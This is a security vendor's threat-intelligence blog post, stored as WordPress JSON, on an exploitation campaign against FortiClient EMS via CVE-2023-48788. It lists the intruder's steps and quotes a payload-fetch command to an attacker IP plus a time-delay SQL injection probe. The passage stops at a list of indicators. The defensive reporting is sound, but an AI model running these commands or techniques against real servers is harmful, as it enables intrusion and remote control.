{"id":86781,"date":"2024-04-11T10:30:00","date_gmt":"2024-04-11T17:30:00","guid":{"rendered":"https:\/\/forescoutstage.wpengine.com\/?p=86781"},"modified":"2024-04-11T13:31:18","modified_gmt":"2024-04-11T20:31:18","slug":"connectfun-new-exploit-campaign-in-the-wild-targets-media-company","status":"publish","type":"post","link":"https:\/\/www.forescout.com\/blog\/connectfun-new-exploit-campaign-in-the-wild-targets-media-company\/","title":{"rendered":"Connect:fun: New exploit campaign in the wild targets media company"},"content":{"rendered":"

In a new threat briefing, Forescout Research \u2013 Vedere Labs details an exploitation campaign targeting organizations running Fortinet\u2019s FortiClient EMS which is vulnerable to CVE-2023-48788. We are designating this campaign Connect:fun<\/strong> because of the use of ScreenConnect and Powerfun as post-exploitation tools \u2013 our first-ever named campaign.<\/p>\n

Here are details of an incident targeting a media company using CVE-2023-48788 with evidence pointing to a possible threat actor active since at least 2022 targeting Fortinet appliances and using Vietnamese and German languages in their infrastructure. We are closely tracking this infrastructure and will report on this actor again in the future. Access our full report<\/a> to read more details of the observed incident, including log collection data and threat hunting opportunities.<\/p>\n

On March 12, 2024 Fortinet published an advisory<\/a> about CVE-2023-48788, a SQL injection vulnerability in the FortiClient EMS security management solution. On March 21, researchers released a proof of concept (PoC) exploit<\/a> for the vulnerability and since then there have been reports of exploits in the wild leading CISA to add the CVE to its list of Known Exploited Vulnerabilities (KEV)<\/a> on March 25.<\/p>\n

\"\"<\/p>\n

<\/a>Exploit details of CVE-2023-48788<\/h2>\n

Since the PoC for CVE-2023-48788 was made available on March 21, we have observed exploitation attempts similar to the PoC. Here we discuss one specific incident that targeted a media company whose FortiClient EMS was vulnerable and exposed to the internet.<\/p>\n

Access The Full Report<\/span><\/a><\/center> <\/p>\n

\"\"<\/p>\n

On March 21, server logs show that the threat actor tried to achieve command execution via a sequence of commands to enable advanced configuration options and the xp_cmdshell stored procedure in SQL Server. Right after the changes, the threat actor used the LOLBAS<\/a> finger.exe to download a malicious payload from 185[.]56[.]83[.]82 but was unsuccessful because of using the incorrect syntax.<\/p>\n

Two days later on March 23, the same actor executed \u201cFINGER ADMIN@185.56.83.82\u201d along with \u201cWAITFOR DELAY ’00:00:10′ –” to check if the command was executed and to see if the vulnerability still existed. Though the command was not successful, the DELAY might have hinted to them that the host was still vulnerable.<\/p>\n

After the actor confirmed the host was still vulnerable, they executed several SQL injections with obfuscated commands to download the ScreenConnect remote management tool and a malicious script based on the open-source Powerfun which includes functionality for bind and reverse shells, as well as execution of arbitrary commands from (Command and Control).<\/p>\n

After a couple of days, we saw multiple SQL statements trying to download ScreenConnect using a domain ursketz[.]com. The file names earlier downloads seen from IP address 95[.]179[.]241[.]10.<\/p>\n

The actor used certutil.exe to download ScreenConnect and install it using msiexec.exe. The attempt to download and install was successful. This is also confirmed by the firewall logs, where we observed traffic to the domain used to download ScreenConnect hosted at 141[.]136[.]43[.]188.<\/p>\n

Connections from ScreenConnect were destined to 144[.]202[.]21[.]16 but we were not able to retrieve the ScreenConnect logs to identify further actions.<\/p>\n

Analysis: Campaign and threat actor details<\/h2>\n

This incident was not isolated. We observed scanning activity from the same IP address 185[.]56[.]83[.]82 for FortiClient EMS in other customer networks beginning March 21 which continued on March 22nd, March 25th and March 28th. The timeframe is consistent with exploitation attempts shown above \u2014 and was observed in customers who do not use FortiClient EMS in their environment but use other VPN appliances. However, we do not see indiscriminate automated exploitation attempts on honeypots as we have seen in the past with other vulnerabilities on edge devices<\/a>. The activity clearly has a manual component evidenced by all the failed attempts to download and install tools, as well as the relatively long time taken between attempts.<\/p>\n

This is evidence the activity is part of a specific campaign rather than an exploit included in automated cybercriminal botnets. From our observations, it appears that the actors behind this campaign are not mass scanning but choosing target environments that have VPN appliances.<\/p>\n

Other cybersecurity companies [1]<\/a> [2]<\/a> have also seen similar incidents with the exploitation of CVE-2023-48788 to download RMM software, including ScreenConnect and Atera. All the reports we have seen are similar, including IP addresses and infrastructure that intersect with our observations and bear hallmarks of manual exploitation.<\/p>\n

The IPs and domains involved in the incident we described above were also involved in previous cases:<\/strong><\/p>\n